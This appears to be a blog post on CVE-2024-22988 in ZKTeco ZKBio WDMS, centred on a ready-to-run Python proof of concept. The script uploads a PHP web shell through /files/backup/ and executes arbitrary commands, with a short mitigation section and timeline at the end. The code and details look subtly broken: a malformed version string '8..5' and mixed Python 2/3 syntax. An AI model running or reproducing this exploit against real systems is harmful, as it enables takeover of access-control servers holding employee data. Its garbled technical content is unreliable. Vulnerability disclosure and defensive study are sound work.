ZKTeco is a leading global provider of innovative biometric and security solutions, with a focus on security surveillance, access control, and time management systems. Their ZKBio WDMS (Workforce Data Management System) is a powerful web-based software solution that streamlines the management of employee data and access rights across multiple physical locations. However, a critical security vulnerability [CVE-2024-22988] was recently discovered in ZKTeco ZKBio WDMS version 8..5, which allows an attacker to execute arbitrary code on the system through the /files/backup/ component. This blog post will discuss the technical details behind this vulnerability, provide code snippets, and explain how attackers can exploit it.

Overview of the Vulnerability

The vulnerability resides in the /files/backup/ component of ZKBio WDMS, which, if exploited successfully, could allow remote attackers to execute arbitrary code on the target system. According to the research provided in the original advisory, the issue is due to improper input validation and insufficient access controls when processing user-supplied data. The vulnerability is assigned a Common Vulnerability and Exposure (CVE) identifier of CVE-2024-22988.

Proof Of Concept (POC) Code

The following Python code snippet can be used to perform a basic proof of concept (POC) attack on a vulnerable ZKTeco ZKBio WDMS system, demonstrating arbitrary code execution:

import requests

target_url = "http://<target-ip>/files/backup/";
file_name = "exploit.php"
payload = '<?php system($_GET["cmd"]); ?>'

# Craft the POST request to upload PHP payload
multipart_form_data = {
    "Filedata": (file_name, payload)
}
response = requests.post(target_url, files=multipart_form_data)

# Check if the payload was uploaded successfully
if response.status_code == 200:
    cmd = raw_input("Enter command to execute: ")
    exploit_url = f"{target_url}{file_name}?cmd={cmd}"
    print("Exploit URL: ", exploit_url)

    # Execute arbitrary command through the PHP payload
    res = requests.get(exploit_url)
    print(res.text)
else:
    print("Failed to upload payload")

Replacing <target-ip> with the IP address of the vulnerable device, this code will upload a PHP file named exploit.php with a simple command execution payload. If uploaded successfully, the attacker can issue arbitrary commands on the system by sending HTTP GET requests to the /files/backup/exploit.php endpoint.

Exploiting this vulnerability allows attackers to gain full control over the affected system, potentially creating a major impact on the confidentiality, integrity, and availability of an organization's sensitive information.

Mitigation Recommendations

To protect against this vulnerability, users of ZKTeco ZKBio WDMS version 8..5 should update their software to the latest version as soon as possible. Updating the software will fix the vulnerability and reduce the risk of data breaches or unauthorized system access. Additionally, the following security best practices should be applied:

Implement proper input validation when accepting user-supplied data.

2. Enforce strong access control policies to restrict unauthorized users from accessing sensitive components.

Conclusion

CVE-2024-22988 is a critical vulnerability that affects ZKTeco ZKBio WDMS v.8..5, allowing attackers to execute arbitrary code on the target system through the /files/backup/ component. Both the code snippet and exploit details provided in this post demonstrate how a remote attacker can compromise a vulnerable system. Therefore, users must take immediate steps to update their software and protect themselves from potential attacks. For further details and updates, please refer to the original advisory here: Original Advisory.

Timeline

Published on: 02/23/2024 23:15:09 UTC
Last modified on: 08/01/2024 13:47:02 UTC